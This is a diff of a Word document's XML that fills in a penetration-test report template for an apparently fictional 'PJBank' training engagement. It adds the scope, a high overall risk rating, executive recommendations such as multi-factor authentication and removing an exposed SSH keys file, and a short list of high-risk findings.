-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660180 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619272 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1543,7 +2133,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1561,10 +2151,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660181" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619273" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1591,7 +2184,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660181 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619273 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1611,7 +2204,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1629,10 +2222,13 @@
               <w:tab w:val="right" w:pos="10790"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc67660182" w:history="1">
+          <w:hyperlink w:anchor="_Toc100619274" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1659,7 +2255,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc67660182 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc100619274 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1679,7 +2275,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1725,7 +2321,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="1" w:name="_Toc67660169"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc100619255"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Security Engagement Summary</w:t>
@@ -1737,7 +2333,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="1fob9te" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc67660170"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc100619256"/>
       <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:t>Engagement Overview</w:t>
@@ -1746,69 +2342,316 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="0" w:after="0"/>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="2et92p0" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc100619257"/>
+      <w:bookmarkEnd w:id="4"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>PJBank</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CISO authorized the development of a cybersecurity training program </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> improve their network security posture.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PJ professional IT services has been contracted to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>test the new training program platform for security weaknesses.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc100619258"/>
+      <w:r>
+        <w:t>Scope</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>We will be testing four pieces of infrastructure linked to the training program.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc100619259"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>The Debian server in the DMZ (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>DMZIServer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> | 10.1.0.7)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc100619260"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>A web Application Server in the DMZ (Debianx64DMZOnCloudNew | 10.1.0.12)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc100619261"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>The Internal Network Device (employee workstation) in the MZ (Win-10 | 10.1.2.4)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc100619262"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>A public web server "Learn About Security" (Learnaboutsecurity.com)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="2et92p0" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="4"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;Provide a brief overview here. This should offer some background information about the Organization and describe the project objective. Use some of the language in the project instructions here.&gt; </w:t>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3263B2" wp14:editId="218750FB">
+            <wp:extent cx="5581650" cy="3000375"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="25" name="Picture 25" descr="Network Diagram of Given"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="Network Diagram of Given"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5581650" cy="3000375"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc67660171"/>
-      <w:r>
-        <w:t>Scope</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;Define the scope here</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. List the target devices that you will </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pentest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, identify their attributes such as hostname, IP address. Provide screenshots where helpful </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="3dy6vkm" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc67660172"/>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkStart w:id="11" w:name="3dy6vkm" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc100619263"/>
+      <w:bookmarkEnd w:id="11"/>
       <w:r>
         <w:t>Risk Analysis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1821,12 +2664,6 @@
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
         <w:t>Considering the significant vulnerabilities identified, the overall security risk of the</w:t>
       </w:r>
       <w:r>
@@ -1843,174 +2680,49 @@
           <w:b/>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;DEFINE </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF9900"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SEVERITY </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="00FF00"/>
-        </w:rPr>
-        <w:t>HERE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="00FF00"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as Low </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF9900"/>
-        </w:rPr>
-        <w:t>Moderate</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="00FF00"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>High</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="00FF00"/>
-        </w:rPr>
-        <w:t>&gt;.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
+        <w:t>high</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, with potential for s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>evere or catastrophic impact</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc100619264"/>
+      <w:r>
+        <w:t>Recommendations</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">High </w:t>
-      </w:r>
-      <w:r>
-        <w:t>– severe or catastrophic impact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Moderate</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – Serious impact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Low</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – limited impact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc67660173"/>
-      <w:r>
-        <w:t>Recommendations</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Complete this section with recommendations based on </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">major vulnerabilities discovered and/or exploited. </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:t>The vulnerabilities highlighted in this report should be remediated</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> as soon as possible&gt;</w:t>
+        <w:t xml:space="preserve"> as soon as possible</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2022,27 +2734,71 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;Make non-technical and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>high level</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> recommendations for an executive team to review. The recommendations should include things that executive-level directors, board members, and if provided to the public, someone non-technical can understand</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>The company should implement a policy that enforces multi-factor authentication. The security analysts determined that account passwords could be guessed and access to the network was gained remotely. Implementing multi-factor authentication would have prevented the analyst from gaining access to the network in this manner.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
         <w:spacing w:after="0"/>
-        <w:ind w:left="720"/>
-      </w:pPr>
-      <w:r>
-        <w:t>For example: The company should implement a policy that enforces multi-factor authentication. The security analysts determined that account passwords could be guessed and access to the network was gained remotely. Implementing multi-factor authentication would have prevented the analyst from gaining access to the network in this manner.&gt;</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>Do not use the same username and password across machines.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Delete the keys file from the DMZI server. It contains SSH login credentials on a publicly accessible URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Do not store snapshots of the server in a vulnerable state.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Do not use common words as passwords.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Update </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the XAMPP service on all machines.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2052,20 +2808,20 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="9" w:name="2s8eyo1" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="10" w:name="26in1rg" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="11" w:name="17dp8vu" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="12" w:name="3rdcrjn" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkStart w:id="13" w:name="_Toc67660174"/>
-      <w:bookmarkEnd w:id="9"/>
-      <w:bookmarkEnd w:id="10"/>
-      <w:bookmarkEnd w:id="11"/>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkStart w:id="14" w:name="2s8eyo1" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="15" w:name="26in1rg" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="16" w:name="17dp8vu" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="17" w:name="3rdcrjn" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc100619265"/>
+      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Significant Vulnerabilities Summary</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2076,7 +2832,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc67660175"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc100619266"/>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
@@ -2086,7 +2842,7 @@
       <w:r>
         <w:t>Risk Vulnerabilities</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2097,7 +2853,6 @@
           <w:right w:val="nil"/>
           <w:between w:val="nil"/>
         </w:pBdr>
-        <w:ind w:left="720"/>
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
@@ -2105,55 +2860,203 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>1. SSH keys are accessible on public URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>. Machines use passwords that are easily guessed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> by wordlists</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>. XAMPP version is out of date.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc67660176"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc100619267"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFC000"/>
+        </w:rPr>
+        <w:t>Medium</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFC000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Risk Vulnerabilities</w:t>
+      </w:r>
